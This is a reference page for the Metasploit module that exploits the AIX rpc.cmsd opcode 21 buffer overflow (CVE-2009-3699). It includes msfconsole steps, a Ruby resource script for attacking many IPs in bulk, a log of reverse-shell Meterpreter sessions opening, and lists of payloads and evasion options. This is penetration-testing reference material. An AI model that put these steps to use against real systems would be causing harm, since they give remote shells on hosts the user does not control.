AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow - Metasploit


This page contains detailed information about how to use the exploit/aix/rpc_cmsd_opcode21 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
Module: exploit/aix/rpc_cmsd_opcode21
Source code: modules/exploits/aix/rpc_cmsd_opcode21.rb
Disclosure date: 2009-10-07
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): AIX
Target service / protocol: -
Target network port(s): 111
List of CVEs: CVE-2009-3699

This module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution. NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where further attempts are not possible.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


Using rpc_cmsd_opcode21 against a single host

Normally, you can use exploit/aix/rpc_cmsd_opcode21 this way:

msf > use exploit/aix/rpc_cmsd_opcode21
msf exploit(rpc_cmsd_opcode21) > show targets
    ... a list of targets ...
msf exploit(rpc_cmsd_opcode21) > set TARGET target-id
msf exploit(rpc_cmsd_opcode21) > show options
    ... show and set options ...
msf exploit(rpc_cmsd_opcode21) > exploit

Using rpc_cmsd_opcode21 against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your rpc_cmsd_opcode21 will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/aix/rpc_cmsd_opcode21")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the aix/rpc_cmsd_opcode21 exploit module looks in the msfconsole:

msf6 > use exploit/aix/rpc_cmsd_opcode21

[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(aix/rpc_cmsd_opcode21) > show info

       Name: AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
     Module: exploit/aix/rpc_cmsd_opcode21
   Platform: AIX
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2009-10-07

Provided by:
  Rodrigo Rubira Branco (BSDaemon)
  jduck <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   IBM AIX Version 5.1

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   111              yes       The target port (TCP)

Payload information:
  Space: 4104
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow vulnerability in opcode 21 
  handled by rpc.cmsd on AIX. By making a request with a long string 
  passed to the first argument of the "rtable_create" RPC, a stack 
  based buffer overflow occurs. This leads to arbitrary code 
  execution. NOTE: Unsuccessful attempts may cause inetd/portmapper to 
  enter a state where further attempts are not possible.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2009-3699
  OSVDB (58726)
  http://www.securityfocus.com/bid/36615
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825
  http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc

Module Options


This is a complete list of options available in the aix/rpc_cmsd_opcode21 exploit:

msf6 exploit(aix/rpc_cmsd_opcode21) > show options

Module options (exploit/aix/rpc_cmsd_opcode21):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   111              yes       The target port (TCP)

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   IBM AIX Version 5.1

Advanced Options


Here is a complete list of advanced options supported by the aix/rpc_cmsd_opcode21 exploit:

msf6 exploit(aix/rpc_cmsd_opcode21) > show advanced

Module advanced options (exploit/aix/rpc_cmsd_opcode21):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   BruteStep                                no        Step size between brute force attempts
   BruteWait                                no        Delay between brute force attempts
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   TIMEOUT                 10               yes       Number of seconds to wait for responses to RPC calls
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the aix/rpc_cmsd_opcode21 module can exploit:

msf6 exploit(aix/rpc_cmsd_opcode21) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   IBM AIX Version 5.1

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the aix/rpc_cmsd_opcode21 exploit:

msf6 exploit(aix/rpc_cmsd_opcode21) > show payloads

Compatible Payloads
===================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  payload/aix/ppc/shell_bind_tcp                      normal  No     AIX Command Shell, Bind TCP Inline
   1  payload/aix/ppc/shell_reverse_tcp                   normal  No     AIX Command Shell, Reverse TCP Inline
   2  payload/generic/custom                              normal  No     Custom Payload
   3  payload/generic/shell_bind_tcp                      normal  No     Generic Command Shell, Bind TCP Inline
   4  payload/generic/shell_reverse_tcp                   normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the aix/rpc_cmsd_opcode21 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(aix/rpc_cmsd_opcode21) > show evasion

Module evasion options:

   Name                               Current Setting  Required  Description
   ----                               ---------------  --------  -----------
   ONCRPC::tcp_request_fragmentation  false            no        Enable fragmentation of TCP ONC/RPC requests
   TCP::max_send_size                 0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                    0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

RPCTimeout


Here is a relevant code snippet related to the "RPCTimeout" error message:

97:	
98:	      handler(sunrpc_callsock)
99:	      sunrpc_destroy
100:	
101:	    rescue Rex::Proto::SunRPC::RPCTimeout
102:	      vprint_error('RPCTimeout')
103:	    rescue Rex::Proto::SunRPC::RPCError => e
104:	      vprint_error(e.to_s)
105:	    rescue EOFError
106:	      vprint_error('EOFError')
107:	    end

EOFError


Here is a relevant code snippet related to the "EOFError" error message:

99:	      sunrpc_destroy
100:	
101:	    rescue Rex::Proto::SunRPC::RPCTimeout
102:	      vprint_error('RPCTimeout')
103:	    rescue Rex::Proto::SunRPC::RPCError => e
104:	      vprint_error(e.to_s)
105:	    rescue EOFError
106:	      vprint_error('EOFError')
107:	    end
108:	  end
109:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Rodrigo Rubira Branco (BSDaemon)
  • jduck

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.